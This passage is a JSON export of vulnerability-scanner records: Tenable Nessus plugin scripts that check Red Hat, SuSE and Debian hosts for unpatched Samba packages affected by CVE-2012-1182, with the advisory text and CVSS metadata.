"p-cpe:/a:redhat:enterprise_linux:samba4-winbind-clients", "p-cpe:/a:redhat:enterprise_linux:samba4-winbind-krb5-locator", "cpe:/o:redhat:enterprise_linux:6"], "id": "REDHAT-RHSA-2013-0506.NASL", "href": "https://www.tenable.com/plugins/nessus/64757", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2013:0506. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(64757);\n script_version(\"1.18\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2012-1182\");\n script_bugtraq_id(52973);\n script_xref(name:\"RHSA\", value:\"2013:0506\");\n\n script_name(english:\"RHEL 6 : samba4 (RHSA-2013:0506)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated samba4 packages that fix one security issue, multiple bugs,\nand add various enhancements are now available for Red Hat Enterprise\nLinux 6.\n\nThe Red Hat Security Response Team has rated this update as having\nmoderate security impact. A Common Vulnerability Scoring System (CVSS)\nbase score, which gives a detailed severity rating, is available from\nthe CVE link in the References section.\n\nSamba is an open source implementation of the Server Message Block\n(SMB) or Common Internet File System (CIFS) protocol, which allows\nPC-compatible machines to share files, printers, and other\ninformation.\n\nA flaw was found in the Samba suite's Perl-based DCE/RPC IDL (PIDL)\ncompiler, used to generate code to handle RPC calls. 
This could result\nin code generated by the PIDL compiler to not sufficiently protect\nagainst buffer overflows. (CVE-2012-1182)\n\nThe samba4 packages have been upgraded to upstream version 4.0.0,\nwhich provides a number of bug fixes and enhancements over the\nprevious version. In particular, improved interoperability with Active\nDirectory (AD) domains. SSSD now uses the libndr-krb5pac library to\nparse the Privilege Attribute Certificate (PAC) issued by an AD Key\nDistribution Center (KDC).\n\nThe Cross Realm Kerberos Trust functionality provided by Identity\nManagement, which relies on the capabilities of the samba4 client\nlibrary, is included as a Technology Preview. This functionality and\nserver libraries, is included as a Technology Preview. This\nfunctionality uses the libndr-nbt library to prepare Connection-less\nLightweight Directory Access Protocol (CLDAP) messages.\n\nAdditionally, various improvements have been made to the Local\nSecurity Authority (LSA) and Net Logon services to allow verification\nof trust from a Windows system. Because the Cross Realm Kerberos Trust\nfunctionality is considered a Technology Preview, selected samba4\ncomponents are considered to be a Technology Preview. For more\ninformation on which Samba packages are considered a Technology\nPreview, refer to Table 5.1, 'Samba4 Package Support' in the Release\nNotes, linked to from the References. (BZ#766333, BZ#882188)\n\nThis update also fixes the following bug :\n\n* Prior to this update, if the Active Directory (AD) server was\nrebooted, Winbind sometimes failed to reconnect when requested by\n'wbinfo -n' or 'wbinfo -s' commands. Consequently, looking up users\nusing the wbinfo tool failed. This update applies upstream patches to\nfix this problem and now looking up a Security Identifier (SID) for a\nusername, or a username for a given SID, works as expected after a\ndomain controller is rebooted. 
(BZ#878564)\n\nAll users of samba4 are advised to upgrade to these updated packages,\nwhich fix these issues and add these enhancements.\n\nWarning: If you upgrade from Red Hat Enterprise Linux 6.3 to Red Hat\nEnterprise Linux 6.4 and you have Samba in use, you should make sure\nthat you uninstall the package named 'samba4' to avoid conflicts\nduring the upgrade.\"\n );\n # https://access.redhat.com/knowledge/docs/en-US/Red_Hat_Enterprise_Linux/6/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?b5caa05f\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2013:0506\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2012-1182\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Samba SetInformationPolicy AuditEventsInfo Heap Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:samba4\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:samba4-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:samba4-common\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:samba4-dc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:samba4-dc-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:samba4-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:samba4-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:samba4-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:samba4-pidl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:samba4-python\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:samba4-swat\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:samba4-test\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:samba4-winbind\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:samba4-winbind-clients\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:samba4-winbind-krb5-locator\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/04/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/02/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/02/21\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 6.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2013:0506\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"samba4-4.0.0-55.el6.rc4\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"samba4-4.0.0-55.el6.rc4\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"samba4-4.0.0-55.el6.rc4\")) flag++;\n if 
(rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"samba4-client-4.0.0-55.el6.rc4\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"samba4-client-4.0.0-55.el6.rc4\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"samba4-client-4.0.0-55.el6.rc4\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"samba4-common-4.0.0-55.el6.rc4\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"samba4-common-4.0.0-55.el6.rc4\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"samba4-common-4.0.0-55.el6.rc4\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"samba4-dc-4.0.0-55.el6.rc4\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"samba4-dc-4.0.0-55.el6.rc4\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"samba4-dc-4.0.0-55.el6.rc4\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"samba4-dc-libs-4.0.0-55.el6.rc4\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"samba4-dc-libs-4.0.0-55.el6.rc4\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"samba4-dc-libs-4.0.0-55.el6.rc4\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"samba4-debuginfo-4.0.0-55.el6.rc4\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"samba4-debuginfo-4.0.0-55.el6.rc4\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"samba4-debuginfo-4.0.0-55.el6.rc4\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"samba4-devel-4.0.0-55.el6.rc4\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"samba4-devel-4.0.0-55.el6.rc4\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"samba4-devel-4.0.0-55.el6.rc4\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"samba4-libs-4.0.0-55.el6.rc4\")) flag++;\n if 
(rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"samba4-libs-4.0.0-55.el6.rc4\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"samba4-libs-4.0.0-55.el6.rc4\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"samba4-pidl-4.0.0-55.el6.rc4\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"samba4-pidl-4.0.0-55.el6.rc4\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"samba4-pidl-4.0.0-55.el6.rc4\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"samba4-python-4.0.0-55.el6.rc4\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"samba4-python-4.0.0-55.el6.rc4\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"samba4-python-4.0.0-55.el6.rc4\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"samba4-swat-4.0.0-55.el6.rc4\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"samba4-swat-4.0.0-55.el6.rc4\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"samba4-swat-4.0.0-55.el6.rc4\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"samba4-test-4.0.0-55.el6.rc4\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"samba4-test-4.0.0-55.el6.rc4\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"samba4-test-4.0.0-55.el6.rc4\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"samba4-winbind-4.0.0-55.el6.rc4\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"samba4-winbind-4.0.0-55.el6.rc4\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"samba4-winbind-4.0.0-55.el6.rc4\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"samba4-winbind-clients-4.0.0-55.el6.rc4\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"samba4-winbind-clients-4.0.0-55.el6.rc4\")) flag++;\n if 
(rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"samba4-winbind-clients-4.0.0-55.el6.rc4\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"samba4-winbind-krb5-locator-4.0.0-55.el6.rc4\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"samba4-winbind-krb5-locator-4.0.0-55.el6.rc4\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"samba4-winbind-krb5-locator-4.0.0-55.el6.rc4\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"samba4 / samba4-client / samba4-common / samba4-dc / samba4-dc-libs / etc\");\n }\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T12:58:43", "description": "A remote code execution flaw in Samba has been fixed :\n\n - PIDL based autogenerated code uses client supplied size values which allows attackers to write beyond the allocated array size. 
(CVE-2012-1182)", "cvss3": {"score": null, "vector": null}, "published": "2012-04-16T00:00:00", "type": "nessus", "title": "SuSE 10 Security Update : Samba (ZYPP Patch Number 8058)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-1182"], "modified": "2021-01-19T00:00:00", "cpe": ["cpe:/o:suse:suse_linux"], "id": "SUSE_CIFS-MOUNT-8058.NASL", "href": "https://www.tenable.com/plugins/nessus/58765", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The text description of this plugin is (C) Novell, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(58765);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2012-1182\");\n\n script_name(english:\"SuSE 10 Security Update : Samba (ZYPP Patch Number 8058)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 10 host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A remote code execution flaw in Samba has been fixed :\n\n - PIDL based autogenerated code uses client supplied size\n values which allows attackers to write beyond the\n allocated array size. 
(CVE-2012-1182)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2012-1182.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply ZYPP patch number 8058.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Samba SetInformationPolicy AuditEventsInfo Heap Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:suse:suse_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/04/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/04/16\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) exit(0, \"Local checks are not enabled.\");\nif (!get_kb_item(\"Host/SuSE/release\")) exit(0, \"The host is not running SuSE.\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) exit(1, \"Could not obtain the list of installed packages.\");\n\ncpu = 
get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) exit(1, \"Failed to determine the architecture type.\");\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") exit(1, \"Local checks for SuSE 10 on the '\"+cpu+\"' architecture have not been implemented.\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLED10\", sp:4, reference:\"cifs-mount-3.0.36-0.13.20.1\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:4, reference:\"ldapsmb-1.34b-25.13.20.1\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:4, reference:\"libsmbclient-3.0.36-0.13.20.1\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:4, reference:\"libsmbclient-devel-3.0.36-0.13.20.1\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:4, reference:\"samba-3.0.36-0.13.20.1\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:4, reference:\"samba-client-3.0.36-0.13.20.1\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:4, reference:\"samba-doc-3.0.36-0.12.20.1\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:4, reference:\"samba-krb-printing-3.0.36-0.13.20.1\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:4, reference:\"samba-vscan-0.3.6b-43.13.20.1\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:4, reference:\"samba-winbind-3.0.36-0.13.20.1\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:4, cpu:\"x86_64\", reference:\"libsmbclient-32bit-3.0.36-0.13.20.1\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:4, cpu:\"x86_64\", reference:\"samba-32bit-3.0.36-0.13.20.1\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:4, cpu:\"x86_64\", reference:\"samba-client-32bit-3.0.36-0.13.20.1\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:4, cpu:\"x86_64\", reference:\"samba-winbind-32bit-3.0.36-0.13.20.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"cifs-mount-3.0.36-0.13.20.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"ldapsmb-1.34b-25.13.20.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"libmsrpc-3.0.36-0.13.20.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, 
reference:\"libmsrpc-devel-3.0.36-0.13.20.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"libsmbclient-3.0.36-0.13.20.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"libsmbclient-devel-3.0.36-0.13.20.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"samba-3.0.36-0.13.20.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"samba-client-3.0.36-0.13.20.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"samba-doc-3.0.36-0.12.20.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"samba-krb-printing-3.0.36-0.13.20.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"samba-python-3.0.36-0.13.20.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"samba-vscan-0.3.6b-43.13.20.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"samba-winbind-3.0.36-0.13.20.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, cpu:\"x86_64\", reference:\"libsmbclient-32bit-3.0.36-0.13.20.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, cpu:\"x86_64\", reference:\"samba-32bit-3.0.36-0.13.20.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, cpu:\"x86_64\", reference:\"samba-client-32bit-3.0.36-0.13.20.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, cpu:\"x86_64\", reference:\"samba-winbind-32bit-3.0.36-0.13.20.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse exit(0, \"The host is not affected.\");\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T12:58:44", "description": "It was discovered that Samba, the SMB/CIFS file, print, and login server, contained a flaw in the remote procedure call (RPC) code which allowed remote code execution as the super user from an unauthenticated connection.", "cvss3": {"score": null, "vector": null}, "published": "2012-04-13T00:00:00", "type": "nessus", 
"title": "Debian DSA-2450-1 : samba - privilege escalation", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-1182"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:samba", "cpe:/o:debian:debian_linux:6.0"], "id": "DEBIAN_DSA-2450.NASL", "href": "https://www.tenable.com/plugins/nessus/58729", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-2450. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(58729);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2012-1182\");\n script_bugtraq_id(52973);\n script_xref(name:\"DSA\", value:\"2450\");\n\n script_name(english:\"Debian DSA-2450-1 : samba - privilege escalation\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"It was discovered that Samba, the SMB/CIFS file, print, and login\nserver, contained a flaw in the remote procedure call (RPC) code which\nallowed remote code execution as the super user from an\nunauthenticated connection.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=668309\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/squeeze/samba\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2012/dsa-2450\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the samba packages.\n\nFor the stable 
distribution (squeeze), this problem has been fixed in\nversion 2:3.5.6~dfsg-3squeeze7.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Samba SetInformationPolicy AuditEventsInfo Heap Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:samba\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:6.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/04/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/04/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"6.0\", prefix:\"libpam-smbpass\", reference:\"2:3.5.6~dfsg-3squeeze7\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libsmbclient\", reference:\"2:3.5.6~dfsg-3squeeze7\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libsmbclient-dev\", reference:\"2:3.5.6~dfsg-3squeeze7\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libwbclient0\", reference:\"2:3.5.6~dfsg-3squeeze7\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"samba\", reference:\"2:3.5.6~dfsg-3squeeze7\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"samba-common\", reference:\"2:3.5.6~dfsg-3squeeze7\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"samba-common-bin\", reference:\"2:3.5.6~dfsg-3squeeze7\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"samba-dbg\", reference:\"2:3.5.6~dfsg-3squeeze7\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"samba-doc\", reference:\"2:3.5.6~dfsg-3squeeze7\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"samba-doc-pdf\", reference:\"2:3.5.6~dfsg-3squeeze7\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"samba-tools\", reference:\"2:3.5.6~dfsg-3squeeze7\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"smbclient\", reference:\"2:3.5.6~dfsg-3squeeze7\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"swat\", reference:\"2:3.5.6~dfsg-3squeeze7\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"winbind\", 
reference:\"2:3.5.6~dfsg-3squeeze7\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T12:54:25", "description": "From Red Hat Security Advisory 2013:0506 :\n\nUpdated samba4 packages that fix one security issue, multiple bugs, and add various enhancements are now available for Red Hat Enterprise Linux 6.\n\nThe Red Hat Security Response Team has rated this update as having moderate security impact. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section.\n\nSamba is an open source implementation of the Server Message Block (SMB) or Common Internet File System (CIFS) protocol, which allows PC-compatible machines to share files, printers, and other information.\n\nA flaw was found in the 